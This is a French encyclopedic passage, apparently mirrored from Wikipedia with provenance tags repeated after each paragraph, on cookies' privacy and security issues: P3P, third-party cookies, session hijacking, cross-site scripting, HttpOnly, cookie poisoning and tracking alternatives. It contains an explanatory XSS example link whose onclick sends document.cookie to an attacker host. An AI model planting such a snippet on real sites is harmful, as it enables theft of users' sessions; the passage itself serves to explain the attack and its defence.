La spécification du P3P inclut la possibilité pour un serveur d'énoncer une politique en matière de protection de la vie privée, qui définit quel genre d'information il collecte et dans quel but. Ces politiques incluent (mais ne sont pas limitées à) l'utilisation de l'information collectée en utilisant les cookies. D'après les définitions du P3P, un navigateur peut accepter ou rejeter les cookies en comparant les politiques en matière de protection de la vie privée avec les préférences de l'utilisateur ou en demandant à l'utilisateur, en lui présentant la politique en matière de protection de la vie privée déclarée par le serveur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La spécification du P3P inclut la possibilité pour un serveur d'énoncer une politique en matière de protection de la vie privée, qui définit quel genre d'information il collecte et dans quel but. Ces politiques incluent (mais ne sont pas limitées à) l'utilisation de l'information collectée en utilisant les cookies. D'après les définitions du P3P, un navigateur peut accepter ou rejeter les cookies en comparant les politiques en matière de protection de la vie privée avec les préférences de l'utilisateur ou en demandant à l'utilisateur, en lui présentant la politique en matière de protection de la vie privée déclarée par le serveur.
×
Beaucoup de navigateurs, incluant Apple Safari et Microsoft Internet Explorer versions 6 et 7, supportent le P3P qui permet au navigateur de déterminer s'il doit accepter le stockage des cookies tierce partie. Le navigateur Opera permet aux utilisateurs de refuser les cookies tiers et de créer un profil de sécurité global et spécifique pour les domaines Internet. Mozilla Firefox version 2 avait abandonné le support du P3P, mais l'a réintégré dans la version 3. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Beaucoup de navigateurs, incluant Apple Safari et Microsoft Internet Explorer versions 6 et 7, supportent le P3P qui permet au navigateur de déterminer s'il doit accepter le stockage des cookies tierce partie. Le navigateur Opera permet aux utilisateurs de refuser les cookies tiers et de créer un profil de sécurité global et spécifique pour les domaines Internet. Mozilla Firefox version 2 avait abandonné le support du P3P, mais l'a réintégré dans la version 3.
×
Les cookies tiers peuvent être bloqués par la plupart des navigateurs afin d'augmenter le respect de la vie privée et de réduire le pistage publicitaire, ceci sans affecter négativement l'expérience web de l'utilisateur. Beaucoup de régies de publicité offrent une option opt out à la publicité ciblée, en mettant en place un cookie générique dans le navigateur qui désactive ce ciblage, mais une telle solution n'est pratiquement pas efficace, quand elle est respectée, car ce cookie générique est effacé dès que l'utilisateur supprime ces cookies, ce qui annule la décision d'opt-out[32]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies tiers peuvent être bloqués par la plupart des navigateurs afin d'augmenter le respect de la vie privée et de réduire le pistage publicitaire, ceci sans affecter négativement l'expérience web de l'utilisateur. Beaucoup de régies de publicité offrent une option opt out à la publicité ciblée, en mettant en place un cookie générique dans le navigateur qui désactive ce ciblage, mais une telle solution n'est pratiquement pas efficace, quand elle est respectée, car ce cookie générique est effacé dès que l'utilisateur supprime ces cookies, ce qui annule la décision d'opt-out.
×
Inconvénients des cookies
En plus des problèmes d'atteinte à la vie privée, les cookies ont aussi quelques inconvénients techniques. En particulier, ils n'identifient pas toujours exactement les utilisateurs, ils peuvent ralentir la performance des sites lorsqu'en grand nombre, ils peuvent être utilisés pour des attaques de sécurité et ils sont en opposition avec le transfert représentatif d'état, style architectural du logiciel. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06En plus des problèmes d'atteinte à la vie privée, les cookies ont aussi quelques inconvénients techniques. En particulier, ils n'identifient pas toujours exactement les utilisateurs, ils peuvent ralentir la performance des sites lorsqu'en grand nombre, ils peuvent être utilisés pour des attaques de sécurité et ils sont en opposition avec le transfert représentatif d'état, style architectural du logiciel.
×
Identification imprécise
Si plus d'un navigateur est utilisé sur un ordinateur, dans chacun d'eux, il y a toujours une unité de stockage séparée pour les cookies. Par conséquent, les cookies n'identifient pas une personne. En revanche, la combinaison d'un compte utilisateur, d'un ordinateur ainsi que d'un navigateur web. Ainsi, n'importe qui peut utiliser ces comptes, les ordinateurs ou les navigateurs qui ont la panoplie des cookies. De même, les cookies ne font pas la différence entre les multiples utilisateurs qui partagent le même compte d'utilisateur, l'ordinateur et le navigateur, comme dans les « internet cafés » ou tout lieu donnant accès libre à des ressources informatiques. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Si plus d'un navigateur est utilisé sur un ordinateur, dans chacun d'eux, il y a toujours une unité de stockage séparée pour les cookies. Par conséquent, les cookies n'identifient pas une personne. En revanche, la combinaison d'un compte utilisateur, d'un ordinateur ainsi que d'un navigateur web. Ainsi, n'importe qui peut utiliser ces comptes, les ordinateurs ou les navigateurs qui ont la panoplie des cookies. De même, les cookies ne font pas la différence entre les multiples utilisateurs qui partagent le même compte d'utilisateur, l'ordinateur et le navigateur, comme dans les « internet cafés » ou tout lieu donnant accès libre à des ressources informatiques.
×
En pratique cependant, un ordinateur, un smartphone ou une tablette « personnel » est aujourd'hui majoritairement utilisé par un seul individu.[réf. nécessaire]. Cela revient à cibler une personne précise et, à travers le volume d’information collectée, arriver à un ciblage personnalisé, même si la personne n'est pas « nommément » identifiée. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06En pratique cependant, un ordinateur, un smartphone ou une tablette « personnel » est aujourd'hui majoritairement utilisé par un seul individu.[réf. nécessaire]. Cela revient à cibler une personne précise et, à travers le volume d’information collectée, arriver à un ciblage personnalisé, même si la personne n'est pas « nommément » identifiée.
×
Vol de cookie
Durant l'opération normale, les cookies sont renvoyés entre le serveur (ou un groupe de serveurs dans le même domaine) et le navigateur de l'ordinateur de l'utilisateur. Puisque les cookies peuvent contenir des informations sensibles (nom de l'utilisateur, mot de passe utilisé pour une authentification, etc.), leurs valeurs ne devraient pas être accessibles aux autres ordinateurs. Le vol de cookie est un acte d'interception des cookies par un tiers non autorisé[33]. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Durant l'opération normale, les cookies sont renvoyés entre le serveur (ou un groupe de serveurs dans le même domaine) et le navigateur de l'ordinateur de l'utilisateur. Puisque les cookies peuvent contenir des informations sensibles (nom de l'utilisateur, mot de passe utilisé pour une authentification, etc.), leurs valeurs ne devraient pas être accessibles aux autres ordinateurs. Le vol de cookie est un acte d'interception des cookies par un tiers non autorisé.
×
Les cookies peuvent être volés via un renifleur de paquets dans une attaque appelée détournement de session. Le trafic sur le net peut être intercepté et lu par des ordinateurs autres que ceux qui envoient et qui reçoivent (particulièrement sur l'espace public Wi-Fi non-chiffré). Ce trafic inclut les cookies envoyés sur des sessions utilisant le protocole HTTP ordinaire. Quand le trafic réseau n'est pas chiffré, des utilisateurs malveillants peuvent ainsi lire les communications d'autres utilisateurs sur le réseau en utilisant des « renifleurs de paquets ». SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies peuvent être volés via un renifleur de paquets dans une attaque appelée détournement de session. Le trafic sur le net peut être intercepté et lu par des ordinateurs autres que ceux qui envoient et qui reçoivent (particulièrement sur l'espace public Wi-Fi non-chiffré). Ce trafic inclut les cookies envoyés sur des sessions utilisant le protocole HTTP ordinaire. Quand le trafic réseau n'est pas chiffré, des utilisateurs malveillants peuvent ainsi lire les communications d'autres utilisateurs sur le réseau en utilisant des « renifleurs de paquets ».
×
Ce problème peut être surmonté en chiffrant la connexion entre l'ordinateur de l'utilisateur et le serveur par l'emploi du protocole HTTPS. Un serveur peut spécifier un drapeau sécurisé tout en mettant en place un cookie ; le navigateur l'enverra seulement sur une ligne sécurisée, comme une connexion en SSL. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Ce problème peut être surmonté en chiffrant la connexion entre l'ordinateur de l'utilisateur et le serveur par l'emploi du protocole HTTPS. Un serveur peut spécifier un drapeau sécurisé tout en mettant en place un cookie ; le navigateur l'enverra seulement sur une ligne sécurisée, comme une connexion en SSL.
×
Cependant, beaucoup de sites, bien qu'utilisant une communication chiffrée HTTPS pour l'authentification de l'utilisateur (c'est-à-dire la page de connexion), envoient ultérieurement des cookies de session et d'autres données normalement, par des connexions HTTP non-chiffrées pour des raisons d'efficacité. Les attaquants peuvent ainsi intercepter les cookies d'autres utilisateurs et en se faisant passer pour eux sur des sites appropriés ou en les utilisant dans des attaques de cookies. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Cependant, beaucoup de sites, bien qu'utilisant une communication chiffrée HTTPS pour l'authentification de l'utilisateur (c'est-à-dire la page de connexion), envoient ultérieurement des cookies de session et d'autres données normalement, par des connexions HTTP non-chiffrées pour des raisons d'efficacité. Les attaquants peuvent ainsi intercepter les cookies d'autres utilisateurs et en se faisant passer pour eux sur des sites appropriés ou en les utilisant dans des attaques de cookies.
×
Un autre moyen pour voler les cookies est l'écriture de script dans les sites et faire en sorte que le navigateur envoie lui-même les cookies à des serveurs malveillants qui ne les reçoivent jamais. Les navigateurs modernes permettent l'exécution de parties de code recherchées à partir du serveur. Si les cookies sont accessibles pendant l'exécution, leurs valeurs peuvent être communiquées sous une certaine forme aux serveurs qui ne devraient pas y accéder. Chiffrer les cookies avant leur envoi sur le réseau n'aide pas à contrer l'attaque. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Un autre moyen pour voler les cookies est l'écriture de script dans les sites et faire en sorte que le navigateur envoie lui-même les cookies à des serveurs malveillants qui ne les reçoivent jamais. Les navigateurs modernes permettent l'exécution de parties de code recherchées à partir du serveur. Si les cookies sont accessibles pendant l'exécution, leurs valeurs peuvent être communiquées sous une certaine forme aux serveurs qui ne devraient pas y accéder. Chiffrer les cookies avant leur envoi sur le réseau n'aide pas à contrer l'attaque.
×
Ce type d'écriture de script dans le site est typiquement employé par les attaquants sur les sites qui permettent aux utilisateurs de publier des contenus HTML. En intégrant une partie de code compatible dans la contribution en HTML, un attaquant peut recevoir des cookies d'autres utilisateurs. La connaissance de ces cookies peut être utilisée en se connectant au même site en utilisant les cookies volés, ainsi en étant reconnu comme l'utilisateur dont les cookies ont été volés. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Ce type d'écriture de script dans le site est typiquement employé par les attaquants sur les sites qui permettent aux utilisateurs de publier des contenus HTML. En intégrant une partie de code compatible dans la contribution en HTML, un attaquant peut recevoir des cookies d'autres utilisateurs. La connaissance de ces cookies peut être utilisée en se connectant au même site en utilisant les cookies volés, ainsi en étant reconnu comme l'utilisateur dont les cookies ont été volés.
×
Un moyen pour prévenir de telles attaques est d'utiliser le drapeau HttpOnly ; c'est une option, introduite en 2002 au sein de la version 6 SP1 d'Internet Explorer, et disponible en PHP depuis la version 5.2.0. Cette option est prévue pour rendre le cookie inaccessible au navigateur via l'exécution de scripts (généralement JavaScript). Les développeurs web devraient considérer cette option dans leur développement de site afin qu'ils soient immunisés contre l'accès aux cookies, notamment de session, via l'exécution de scripts au sein du navigateur de l'utilisateur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Un moyen pour prévenir de telles attaques est d'utiliser le drapeau HttpOnly ; c'est une option, introduite en 2002 au sein de la version 6 SP1 d'Internet Explorer, et disponible en PHP depuis la version 5.2.0. Cette option est prévue pour rendre le cookie inaccessible au navigateur via l'exécution de scripts (généralement JavaScript). Les développeurs web devraient considérer cette option dans leur développement de site afin qu'ils soient immunisés contre l'accès aux cookies, notamment de session, via l'exécution de scripts au sein du navigateur de l'utilisateur.
×
Une autre menace de sécurité utilisée est la fabrication de demandes dans le site. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Une autre menace de sécurité utilisée est la fabrication de demandes dans le site.
×
La spécification technique officielle permet aux cookies d'être renvoyés uniquement aux serveurs du domaine dont ils sont originaires. Cependant, la valeur des cookies peut être envoyée à d'autres serveurs en utilisant des moyens différents des en-têtes de cookies. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La spécification technique officielle permet aux cookies d'être renvoyés uniquement aux serveurs du domaine dont ils sont originaires. Cependant, la valeur des cookies peut être envoyée à d'autres serveurs en utilisant des moyens différents des en-têtes de cookies.
×
En particulier, les langages de script comme JavaScript sont généralement autorisés à accéder aux valeurs des cookies et sont capables d'envoyer des valeurs arbitraires à n'importe quel serveur sur Internet. Cette capacité des scripts est utilisée à partir de sites web permettant aux utilisateurs de poster des contenus HTML que d'autres utilisateurs peuvent voir. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06En particulier, les langages de script comme JavaScript sont généralement autorisés à accéder aux valeurs des cookies et sont capables d'envoyer des valeurs arbitraires à n'importe quel serveur sur Internet. Cette capacité des scripts est utilisée à partir de sites web permettant aux utilisateurs de poster des contenus HTML que d'autres utilisateurs peuvent voir.
×
Par exemple, un attaquant fonctionnant sur le domaine exemple.com peut publier un commentaire contenant le lien suivant pointant vers un blog populaire qu'il ne contrôle pas autrement : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Par exemple, un attaquant fonctionnant sur le domaine exemple.com peut publier un commentaire contenant le lien suivant pointant vers un blog populaire qu'il ne contrôle pas autrement :
×
<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a> SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>
×
Quand un autre utilisateur clique sur ce lien, le navigateur exécute la partie de code de l'attribut onclick, ainsi il remplace la chaîne de caractère document.cookie par la liste des cookies de l'utilisateur qui sont actifs pour cette page. Par conséquent, cette liste de cookies est envoyée au serveur exemple.com, et l'attaquant est donc capable de collecter les cookies de cet utilisateur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Quand un autre utilisateur clique sur ce lien, le navigateur exécute la partie de code de l'attribut onclick, ainsi il remplace la chaîne de caractère document.cookie par la liste des cookies de l'utilisateur qui sont actifs pour cette page. Par conséquent, cette liste de cookies est envoyée au serveur exemple.com, et l'attaquant est donc capable de collecter les cookies de cet utilisateur.
×
Ce type d'attaque est difficile à détecter du côté utilisateur . En effet le script provient du même domaine qui a mis en place le cookie, et l'opération d'envoi des valeurs semble être autorisée par ce domaine. Il est considéré que c'est la responsabilité des administrateurs opérant ce type de sites de mettre en place des restrictions empêchant la publication de code malveillant. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Ce type d'attaque est difficile à détecter du côté utilisateur . En effet le script provient du même domaine qui a mis en place le cookie, et l'opération d'envoi des valeurs semble être autorisée par ce domaine. Il est considéré que c'est la responsabilité des administrateurs opérant ce type de sites de mettre en place des restrictions empêchant la publication de code malveillant.
×
Les cookies ne sont pas directement visibles aux programmes du côté client comme le JavaScript s'ils ont été envoyés avec le drapeau HttpOnly. Du point de vue du serveur, la seule différence est que dans la ligne de l'en-tête Set-Cookie y est ajouté un nouveau champ contenant la chaîne de caractères HttpOnly : SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies ne sont pas directement visibles aux programmes du côté client comme le JavaScript s'ils ont été envoyés avec le drapeau HttpOnly. Du point de vue du serveur, la seule différence est que dans la ligne de l'en-tête Set-Cookie y est ajouté un nouveau champ contenant la chaîne de caractères HttpOnly :
×
Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly
×
Quand le navigateur reçoit un tel cookie, il est censé l'utiliser normalement dans l'échange HTTP suivant, mais sans le rendre visible aux scripts exécutés du côté client. Le drapeau HttpOnly ne fait partie d'aucune spécification technique officielle et n'est pas implémenté dans tous les navigateurs. Il n'y a actuellement aucun moyen de prévenir la lecture et l'écriture des cookies de session par la méthode XMLHttpRequest. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Quand le navigateur reçoit un tel cookie, il est censé l'utiliser normalement dans l'échange HTTP suivant, mais sans le rendre visible aux scripts exécutés du côté client. Le drapeau HttpOnly ne fait partie d'aucune spécification technique officielle et n'est pas implémenté dans tous les navigateurs. Il n'y a actuellement aucun moyen de prévenir la lecture et l'écriture des cookies de session par la méthode XMLHttpRequest.
×
Modification de cookie
Dès que les cookies ont besoin d'être stockés et renvoyés inchangés au serveur, un attaquant peut modifier la valeur des cookies avant leur renvoi au serveur. Par exemple, si un cookie contient la valeur totale que l'utilisateur doit payer pour les articles mis dans le panier du magasin, en changeant cette valeur le serveur est exposé au risque de faire payer moins l'attaquant que le prix de départ. Le procédé de modifier la valeur des cookies est appelé cookie poisoning et peut être utilisé après un vol de cookie pour rendre l'attaque persistante. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Dès que les cookies ont besoin d'être stockés et renvoyés inchangés au serveur, un attaquant peut modifier la valeur des cookies avant leur renvoi au serveur. Par exemple, si un cookie contient la valeur totale que l'utilisateur doit payer pour les articles mis dans le panier du magasin, en changeant cette valeur le serveur est exposé au risque de faire payer moins l'attaquant que le prix de départ. Le procédé de modifier la valeur des cookies est appelé cookie poisoning et peut être utilisé après un vol de cookie pour rendre l'attaque persistante.
×
La plupart des sites web, cependant, stockent seulement un identifiant de session — un numéro unique généré aléatoirement utilisé pour identifier l'utilisateur de la session — dans le cookie lui-même, alors que tout le reste de l'information est stocké sur le serveur. Dans ce cas, ce problème est en grande partie résolu. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06La plupart des sites web, cependant, stockent seulement un identifiant de session — un numéro unique généré aléatoirement utilisé pour identifier l'utilisateur de la session — dans le cookie lui-même, alors que tout le reste de l'information est stocké sur le serveur. Dans ce cas, ce problème est en grande partie résolu.
×
Manipulation de cookies entre sites web
Chaque site est supposé avoir ses propres cookies, donc un site ne devrait pas être capable de modifier ou créer des cookies associés à un autre site. Une faille de sécurité d'un navigateur web peut être à l'origine d'une infraction à cette règle par des sites malveillants. L'exploitation d'une telle faille est couramment appelée cross-site cooking. Le but de telles attaques peut être le vol de l'identifiant de session. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Chaque site est supposé avoir ses propres cookies, donc un site ne devrait pas être capable de modifier ou créer des cookies associés à un autre site. Une faille de sécurité d'un navigateur web peut être à l'origine d'une infraction à cette règle par des sites malveillants. L'exploitation d'une telle faille est couramment appelée cross-site cooking. Le but de telles attaques peut être le vol de l'identifiant de session.
×
Les utilisateurs devraient utiliser les versions les plus récentes des navigateurs web dans lesquels ces vulnérabilités sont pratiquement éliminées. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les utilisateurs devraient utiliser les versions les plus récentes des navigateurs web dans lesquels ces vulnérabilités sont pratiquement éliminées.
×
État contradictoire entre le client et le serveur
L'utilisation des cookies peut générer une contradiction entre l'état du client et l'état stocké dans le cookie. Si l'utilisateur acquiert un cookie et clique sur le bouton « Retour » du navigateur, l'état du navigateur n'est généralement pas le même qu'avant cette acquisition. Par exemple, si le panier d'une boutique en ligne est réalisé en utilisant les cookies, le contenu du panier ne peut pas changer quand l'utilisateur revient dans l'historique du navigateur : si l'utilisateur presse sur un bouton pour ajouter un article dans son panier et clique sur le bouton « Retour », l'article reste dans celui-ci. Cela n'est peut-être pas l'intention de l'utilisateur, qui veut certainement annuler l'ajout de l'article. Cela peut mener à un manque de fiabilité, de la confusion et des bugs. Les développeurs web doivent donc être conscients de ce problème et mettre en œuvre des mesures visant à prévenir des situations comme celle-ci. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06L'utilisation des cookies peut générer une contradiction entre l'état du client et l'état stocké dans le cookie. Si l'utilisateur acquiert un cookie et clique sur le bouton « Retour » du navigateur, l'état du navigateur n'est généralement pas le même qu'avant cette acquisition. Par exemple, si le panier d'une boutique en ligne est réalisé en utilisant les cookies, le contenu du panier ne peut pas changer quand l'utilisateur revient dans l'historique du navigateur : si l'utilisateur presse sur un bouton pour ajouter un article dans son panier et clique sur le bouton « Retour », l'article reste dans celui-ci. Cela n'est peut-être pas l'intention de l'utilisateur, qui veut certainement annuler l'ajout de l'article. Cela peut mener à un manque de fiabilité, de la confusion et des bugs. Les développeurs web doivent donc être conscients de ce problème et mettre en œuvre des mesures visant à prévenir des situations comme celle-ci.
×
Échéance de cookie
Les cookies permanents ont été critiqués par les experts de la sécurité de la vie privée[réf. nécessaire] pour ne pas être prévus pour expirer assez tôt, et de ce fait permettre aux sites web de suivre les utilisateurs et de construire au fur et à mesure leur profil. Cet aspect des cookies fait partie aussi du problème de détournement de session, parce qu'un cookie permanent volé peut être utilisé pour se faire passer pour un utilisateur pour une période de temps considérable. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les cookies permanents ont été critiqués par les experts de la sécurité de la vie privée[réf. nécessaire] pour ne pas être prévus pour expirer assez tôt, et de ce fait permettre aux sites web de suivre les utilisateurs et de construire au fur et à mesure leur profil. Cet aspect des cookies fait partie aussi du problème de détournement de session, parce qu'un cookie permanent volé peut être utilisé pour se faire passer pour un utilisateur pour une période de temps considérable.
×
Alternatives aux cookies
Certaines opérations qui peuvent être réalisées grâce aux cookies, peuvent aussi être réalisées en utilisant d'autres mécanismes qui permettent de se passer de cookies ou de recréer des cookies effacés, ce qui crée des problèmes de vie privée de la même manière (ou parfois pire, car alors invisibles) que les cookies. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Certaines opérations qui peuvent être réalisées grâce aux cookies, peuvent aussi être réalisées en utilisant d'autres mécanismes qui permettent de se passer de cookies ou de recréer des cookies effacés, ce qui crée des problèmes de vie privée de la même manière (ou parfois pire, car alors invisibles) que les cookies.
×
Adresse IP
Les utilisateurs peuvent être suivis avec l'adresse IP de l'ordinateur appelant la page. Cette technique a été disponible depuis l'introduction du World Wide Web, au fur et à mesure que les pages sont téléchargées. Le serveur demande l'adresse IP de l'ordinateur utilisant le navigateur ou le proxy, si un proxy est utilisé. Le serveur peut suivre cette information qu'il y ait ou non des cookies utilisés. Cependant, ces adresses sont typiquement moins fiables dans l'identification d'un utilisateur que les cookies, car les ordinateurs et les proxys peuvent être partagés par plusieurs utilisateurs, et le même ordinateur peut recevoir une adresse IP différente sur chaque session de travail (comme c'est souvent le cas pour les connexions téléphoniques). SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les utilisateurs peuvent être suivis avec l'adresse IP de l'ordinateur appelant la page. Cette technique a été disponible depuis l'introduction du World Wide Web, au fur et à mesure que les pages sont téléchargées. Le serveur demande l'adresse IP de l'ordinateur utilisant le navigateur ou le proxy, si un proxy est utilisé. Le serveur peut suivre cette information qu'il y ait ou non des cookies utilisés. Cependant, ces adresses sont typiquement moins fiables dans l'identification d'un utilisateur que les cookies, car les ordinateurs et les proxys peuvent être partagés par plusieurs utilisateurs, et le même ordinateur peut recevoir une adresse IP différente sur chaque session de travail (comme c'est souvent le cas pour les connexions téléphoniques).
×
Le suivi par les adresses IP peut être fiable dans certaines situations, comme le cas des connexions à bandes larges qui maintiennent la même adresse IP pour une longue période, aussi longtemps que le courant passe. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Le suivi par les adresses IP peut être fiable dans certaines situations, comme le cas des connexions à bandes larges qui maintiennent la même adresse IP pour une longue période, aussi longtemps que le courant passe.
×
Certains systèmes comme Tor sont conçus pour maintenir l'anonymat d'Internet et rendre impossible ou impraticable le suivi par adresse IP. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Certains systèmes comme Tor sont conçus pour maintenir l'anonymat d'Internet et rendre impossible ou impraticable le suivi par adresse IP.
×
URL
Une technique plus précise est basée sur l'encastrement d'information dans les URL. La partie requête de chaînes de caractères de l'URL est l'une des techniques qui sont typiquement utilisées dans ce but, mais d'autres parties peuvent être utilisées aussi bien. Le servlet Java et les mécanismes de session PHP utilisent tous les deux cette méthode si les cookies ne sont pas activés. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Une technique plus précise est basée sur l'encastrement d'information dans les URL. La partie requête de chaînes de caractères de l'URL est l'une des techniques qui sont typiquement utilisées dans ce but, mais d'autres parties peuvent être utilisées aussi bien. Le servlet Java et les mécanismes de session PHP utilisent tous les deux cette méthode si les cookies ne sont pas activés.
×
Cette méthode comprend le serveur web apposant des requêtes de chaînes de caractères aux liens de la page web qui la porte quand elle est envoyée au navigateur. Quand l'utilisateur suit un lien, le navigateur retourne la chaîne de requête attachée au serveur. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Cette méthode comprend le serveur web apposant des requêtes de chaînes de caractères aux liens de la page web qui la porte quand elle est envoyée au navigateur. Quand l'utilisateur suit un lien, le navigateur retourne la chaîne de requête attachée au serveur.
×
Les chaînes de requête utilisées dans ce but et les cookies sont très similaires, tous les deux étant des informations arbitrairement choisies par le serveur et renvoyées par le navigateur. Cependant, il y a quelques différences : lorsqu'une URL contenant une chaîne de requête est réutilisée, les mêmes informations sont envoyées au serveur. Par exemple, si les préférences d'un utilisateur sont encodées dans une chaîne de requête d'une URL et que l'utilisateur envoie cette URL à un autre utilisateur par e-mail, ce dernier pourra également utiliser ces préférences. En revanche, lorsqu'un utilisateur accède à la même page deux fois, il n'y a pas de garantie que la même chaîne de requête soit utilisée les deux fois. Par exemple, si un utilisateur arrive sur une page à partir d'une page interne du site la première fois et arrive sur la même page à partir d'une page externe la seconde fois, la chaîne de requête relative à la page du site est typiquement différente, alors que les cookies sont les mêmes. SourcéSourcé Ce passage est explicitement présent dans la source Wikipédia localisée. Une corroboration indépendante est distinguée séparément.Source : Wikipédia · 238643065Passage comparé le 2026-10-06Les chaînes de requête utilisées dans ce but et les cookies sont très similaires, tous les deux étant des informations arbitrairement choisies par le serveur et renvoyées par le navigateur. Cependant, il y a quelques différences : lorsqu'une URL contenant une chaîne de requête est réutilisée, les mêmes informations sont envoyées au serveur. Par exemple, si les préférences d'un utilisateur sont encodées dans une chaîne de requête d'une URL et que l'utilisateur envoie cette URL à un autre utilisateur par e-mail, ce dernier pourra également utiliser ces préférences. En revanche, lorsqu'un utilisateur accède à la même page deux fois, il n'y a pas de garantie que la même chaîne de requête soit utilisée les deux fois. Par exemple, si un utilisateur arrive sur une page à partir d'une page interne du site la première fois et arrive sur la même page à partir d'une page externe la seconde fois, la chaîne de requête relative à la page du site est typiquement différente, alors que les cookies sont les mêmes.
×
